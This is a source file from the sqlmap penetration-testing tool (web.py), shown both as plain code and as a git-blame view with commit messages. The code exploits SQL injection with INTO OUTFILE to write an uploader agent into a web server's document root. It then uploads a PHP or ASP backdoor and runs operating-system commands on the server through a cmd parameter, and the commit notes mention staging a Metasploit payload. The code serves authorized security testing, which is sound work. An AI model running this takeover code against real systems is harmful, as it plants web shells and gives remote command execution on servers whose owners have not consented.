sqlmap/lib/takeover/web.py

#!/usr/bin/env python

"""
$Id$

This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.

sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
details.

You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
"""

import os
import re

from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import decloakToNamedTemporaryFile
from lib.core.common import fileToStr
from lib.core.common import getDirs
from lib.core.common import getDocRoot
from lib.core.common import ntToPosixSlashes
from lib.core.common import isWindowsPath
from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.exception import sqlmapUnsupportedDBMSException
from lib.core.shell import autoCompletion
from lib.request.connect import Connect as Request


class Web:
    """
    This class defines web-oriented OS takeover functionalities for
    plugins.
    """

    def __init__(self):
        self.webApi         = None
        self.webBaseUrl     = None
        self.webBackdoorUrl = None
        self.webUploaderUrl = None
        self.webDirectory   = None

    def webBackdoorRunCmd(self, cmd):
        if self.webBackdoorUrl is None:
            return

        output = None

        if not cmd:
            cmd = conf.osCmd

        cmdUrl  = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
        page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)

        if page is not None:
            output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)

            if output:
                output = output.group(1)

        return output

    def webFileUpload(self, fileToUpload, destFileName, directory):
        inputFile = open(fileToUpload, "r")
        retVal = self.__webFileStreamUpload(inputFile, destFileName, directory)
        inputFile.close()
        return retVal

    def __webFileStreamUpload(self, stream, destFileName, directory):
        if self.webApi in ("php", "asp"):
            multipartParams = {
                                "upload":    "1",
                                "file":      stream,
                                "uploadDir": directory,
                              }

            page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)

            if stream:
                stream.seek(0)

            if "File uploaded" not in page:
                warnMsg  = "unable to upload the backdoor through "
                warnMsg += "the uploader agent on '%s'" % directory
                logger.warn(warnMsg)
                return False
            else:
                return True

        elif self.webApi == "jsp":
            return False

    def __webFileInject(self, fileContent, fileName, directory):
        outFile     = normalizePath("%s/%s" % (directory, fileName))
        uplQuery    = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)
        query       = " LIMIT 1 INTO OUTFILE '%s' " % outFile
        query      += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
        query       = agent.prefixQuery(" %s" % query)
        query       = agent.postfixQuery(query)
        payload     = agent.payload(newValue=query)
        page        = Request.queryPage(payload)

    def webInit(self):
        """
        This method is used to write a web backdoor (agent) on a writable
        remote directory within the web server document root.
        """

        if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:
            return

        self.checkDbmsOs()

        kb.docRoot  = getDocRoot()
        directories = getDirs()
        directories = list(directories)
        directories.sort()

        infoMsg = "trying to upload the uploader agent"
        logger.info(infoMsg)

        message  = "which web application language does the web server "
        message += "support?\n"
        message += "[1] ASP\n"
        message += "[2] PHP (default)\n"
        message += "[3] JSP"

        while True:
            choice = readInput(message, default="2")

            if not choice or choice == "2":
                self.webApi = "php"
                break

            elif choice == "1":
                self.webApi = "asp"
                break

            elif choice == "3":
                errMsg  = "JSP web backdoor functionality is not yet "
                errMsg += "implemented"
                raise sqlmapUnsupportedDBMSException(errMsg)

            elif not choice.isdigit():
                logger.warn("invalid value, only digits are allowed")

            elif int(choice) < 1 or int(choice) > 3:
                logger.warn("invalid value, it must be 1 or 3")

        backdoorName = "backdoor.%s" % self.webApi
        backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'), backdoorName)
        backdoorContent = backdoorStream.read()
        backdoorStream.seek(0)
        
        uploaderName = "uploader.%s" % self.webApi
        uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))
        
        for directory in directories:
            # Upload the uploader agent
            self.__webFileInject(uploaderContent, uploaderName, directory)
            
            requestDir  = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/").replace("//", "/")
            if isWindowsPath(requestDir):
                requestDir = requestDir[2:]
            requestDir  = normalizePath(requestDir)
            self.webBaseUrl     = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
            self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName)
            self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))
            uplPage, _  = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)
            
            if "sqlmap file uploader" not in uplPage:
                warnMsg  = "unable to upload the uploader "
                warnMsg += "agent on '%s'" % directory
                logger.warn(warnMsg)

                continue

            infoMsg  = "the uploader agent has been successfully uploaded "
            infoMsg += "on '%s'" % directory
            logger.info(infoMsg)
            
            if kb.os == "Windows":
                directory = posixToNtSlashes(directory)
            
            if not self.__webFileStreamUpload(backdoorStream, backdoorName, directory):
                message   = "backdoor hasn't been successfully uploaded "
                message  += "with uploader probably because of permission "
                message  += "issues. do you want to try the same method used "
                message  += "for uploader? [y/N] "
                getOutput = readInput(message, default="N")
                if getOutput in ("y", "Y"):
                    self.__webFileInject(self, backdoorContent, backdoorName, directory)
                else:
                    continue

            self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
            self.webDirectory = directory
            infoMsg  = "the backdoor has probably been successfully "
            infoMsg += "uploaded on '%s', go with your browser " % directory
            infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
            logger.info(infoMsg)

            break
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`#!/usr/bin/env python`

			`"""`
			$Id$

			`This file is part of the sqlmap project, http://sqlmap.sourceforge.net.`

			`Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>`
			`Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>`

			`sqlmap is free software; you can redistribute it and/or modify it under`
			`the terms of the GNU General Public License as published by the Free`
			`Software Foundation version 2 of the License.`

			`sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY`
			`WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS`
			`FOR A PARTICULAR PURPOSE. See the GNU General Public License for more`
			`details.`

			`You should have received a copy of the GNU General Public License along`
			`with sqlmap; if not, write to the Free Software Foundation, Inc., 51`
			`Franklin St, Fifth Floor, Boston, MA 02110-1301 USA`
			`"""`

			`import os`
			`import re`

quick fix 2010-01-28 19:56:00 +03:00			`from extra.cloak.cloak import decloak`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`from lib.core.agent import agent`
some refactoring regarding decloaking 2010-01-28 19:50:34 +03:00			`from lib.core.common import decloakToNamedTemporaryFile`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`from lib.core.common import fileToStr`
			`from lib.core.common import getDirs`
			`from lib.core.common import getDocRoot`
code refactoring - added functions posixToNtSlashes and ntToPosixSlashes 2010-02-04 17:37:00 +03:00			`from lib.core.common import ntToPosixSlashes`
some bug fixes regarding --os-shell usage against windows servers 2010-02-04 12:49:31 +03:00			`from lib.core.common import isWindowsPath`
used normalizePath instead of os.path.normalize 2010-02-03 19:10:09 +03:00			`from lib.core.common import normalizePath`
code refactoring - added functions posixToNtSlashes and ntToPosixSlashes 2010-02-04 17:37:00 +03:00			`from lib.core.common import posixToNtSlashes`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`from lib.core.common import readInput`
			`from lib.core.convert import hexencode`
			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.data import paths`
			`from lib.core.exception import sqlmapUnsupportedDBMSException`
			`from lib.core.shell import autoCompletion`
			`from lib.request.connect import Connect as Request`


			`class Web:`
			`"""`
			`This class defines web-oriented OS takeover functionalities for`
			`plugins.`
			`"""`

			`def __init__(self):`
			`self.webApi = None`
			`self.webBaseUrl = None`
			`self.webBackdoorUrl = None`
			`self.webUploaderUrl = None`
Minor code refactoring 2010-01-14 23:42:45 +03:00			`self.webDirectory = None`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
Minor code refactoring 2010-01-14 17:33:08 +03:00			`def webBackdoorRunCmd(self, cmd):`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`if self.webBackdoorUrl is None:`
			`return`

			`output = None`

			`if not cmd:`
			`cmd = conf.osCmd`

			`cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)`
			`page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)`

			`if page is not None:`
Minor code refactoring 2010-01-14 17:33:08 +03:00			`output = re.search("<pre>(.+?)</pre>", page, re.I \| re.S)`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`if output:`
Minor code refactoring 2010-01-14 17:33:08 +03:00			`output = output.group(1)`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`return output`

			`def webFileUpload(self, fileToUpload, destFileName, directory):`
Minor cosmetic adjustments 2010-01-28 20:07:34 +03:00			`inputFile = open(fileToUpload, "r")`
more fixes :) 2010-02-04 13:10:41 +03:00			`retVal = self.__webFileStreamUpload(inputFile, destFileName, directory)`
Minor cosmetic adjustments 2010-01-28 20:07:34 +03:00			`inputFile.close()`
more fixes :) 2010-02-04 13:10:41 +03:00			`return retVal`
Minor cosmetic adjustments 2010-01-28 20:07:34 +03:00
some refactoring regarding decloaking 2010-01-28 19:50:34 +03:00			`def __webFileStreamUpload(self, stream, destFileName, directory):`
some changes regarding web takeover 2010-02-09 17:27:41 +03:00			`if self.webApi in ("php", "asp"):`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`multipartParams = {`
			`"upload": "1",`
modified a way to handle shell scripts 2010-01-27 16:59:25 +03:00			`"file": stream,`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`"uploadDir": directory,`
			`}`
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00
some changes regarding web takeover 2010-02-09 17:27:41 +03:00			`page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00			`if stream:`
			`stream.seek(0)`

Minor cosmetic adjustments 2010-01-28 20:07:34 +03:00			`if "File uploaded" not in page:`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`warnMsg = "unable to upload the backdoor through "`
			`warnMsg += "the uploader agent on '%s'" % directory`
			`logger.warn(warnMsg)`
more fixes :) 2010-02-04 13:10:41 +03:00			`return False`
			`else:`
			`return True`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`elif self.webApi == "jsp":`
more fixes :) 2010-02-04 13:10:41 +03:00			`return False`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00			`def __webFileInject(self, fileContent, fileName, directory):`
			`outFile = normalizePath("%s/%s" % (directory, fileName))`
			`uplQuery = fileContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory)`
			`query = " LIMIT 1 INTO OUTFILE '%s' " % outFile`
			`query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)`
			`query = agent.prefixQuery(" %s" % query)`
			`query = agent.postfixQuery(query)`
			`payload = agent.payload(newValue=query)`
			`page = Request.queryPage(payload)`

Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`def webInit(self):`
			`"""`
			`This method is used to write a web backdoor (agent) on a writable`
			`remote directory within the web server document root.`
			`"""`

			`if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:`
			`return`

Minor self fix, switched to rc6 2010-01-28 13:27:47 +03:00			`self.checkDbmsOs()`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`kb.docRoot = getDocRoot()`
Minor code refactoring 2010-01-14 23:42:45 +03:00			`directories = getDirs()`
			`directories = list(directories)`
			`directories.sort()`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`infoMsg = "trying to upload the uploader agent"`
			`logger.info(infoMsg)`

			`message = "which web application language does the web server "`
			`message += "support?\n"`
			`message += "[1] ASP\n"`
			`message += "[2] PHP (default)\n"`
			`message += "[3] JSP"`

			`while True:`
			`choice = readInput(message, default="2")`

			`if not choice or choice == "2":`
			`self.webApi = "php"`
			`break`

			`elif choice == "1":`
			`self.webApi = "asp"`
			`break`

			`elif choice == "3":`
			`errMsg = "JSP web backdoor functionality is not yet "`
			`errMsg += "implemented"`
			`raise sqlmapUnsupportedDBMSException(errMsg)`

			`elif not choice.isdigit():`
			`logger.warn("invalid value, only digits are allowed")`

			`elif int(choice) < 1 or int(choice) > 3:`
			`logger.warn("invalid value, it must be 1 or 3")`

			`backdoorName = "backdoor.%s" % self.webApi`
some refactoring regarding decloaking 2010-01-28 19:50:34 +03:00			`backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'), backdoorName)`
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00			`backdoorContent = backdoorStream.read()`
			`backdoorStream.seek(0)`
modified a way to handle shell scripts 2010-01-27 16:59:25 +03:00
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`uploaderName = "uploader.%s" % self.webApi`
quick fix regarding usage of StringIO instead of file stream 2010-01-27 18:44:35 +03:00			`uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))`
modified a way to handle shell scripts 2010-01-27 16:59:25 +03:00
Minor code refactoring 2010-01-14 23:42:45 +03:00			`for directory in directories:`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`# Upload the uploader agent`
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00			`self.__webFileInject(uploaderContent, uploaderName, directory)`
used normalizePath instead of os.path.normalize 2010-02-03 19:10:09 +03:00
minor fix 2010-02-04 17:39:24 +03:00			`requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/").replace("//", "/")`
some bug fixes regarding --os-shell usage against windows servers 2010-02-04 12:49:31 +03:00			`if isWindowsPath(requestDir):`
used normalizePath instead of os.path.normalize 2010-02-03 19:10:09 +03:00			`requestDir = requestDir[2:]`
fixed serious issue with adding file paths into kb.absFilePaths (dirname was wrongly added, and afterwards getDirs used dirname of dirname) also, fixed some issues with Windows paths 2010-02-03 19:40:12 +03:00			`requestDir = normalizePath(requestDir)`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)`
			`self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName)`
code refactoring - added functions posixToNtSlashes and ntToPosixSlashes 2010-02-04 17:37:00 +03:00			`self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/"))`
bug fix for 404 program termination during shell upload attempt 2010-02-03 19:16:34 +03:00			`uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False)`
some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00
Minor cosmetic adjustments 2010-01-28 20:07:34 +03:00			`if "sqlmap file uploader" not in uplPage:`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00			`warnMsg = "unable to upload the uploader "`
			`warnMsg += "agent on '%s'" % directory`
			`logger.warn(warnMsg)`

			`continue`

			`infoMsg = "the uploader agent has been successfully uploaded "`
			`infoMsg += "on '%s'" % directory`
			`logger.info(infoMsg)`
code refactoring - added functions posixToNtSlashes and ntToPosixSlashes 2010-02-04 17:37:00 +03:00
			`if kb.os == "Windows":`
			`directory = posixToNtSlashes(directory)`

some updates regarding --os-shell option 2010-02-16 16:20:34 +03:00			`if not self.__webFileStreamUpload(backdoorStream, backdoorName, directory):`
			`message = "backdoor hasn't been successfully uploaded "`
			`message += "with uploader probably because of permission "`
			`message += "issues. do you want to try the same method used "`
			`message += "for uploader? [y/N] "`
			`getOutput = readInput(message, default="N")`
			`if getOutput in ("y", "Y"):`
			`self.__webFileInject(self, backdoorContent, backdoorName, directory)`
			`else:`
			`continue`

			`self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)`
			`self.webDirectory = directory`
			`infoMsg = "the backdoor has probably been successfully "`
			`infoMsg += "uploaded on '%s', go with your browser " % directory`
			`infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl`
			`logger.info(infoMsg)`
Added automatic support in --os-pwn to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP. Updated ChangeLog. Major code refactoring. 2010-01-14 17:03:16 +03:00
			`break`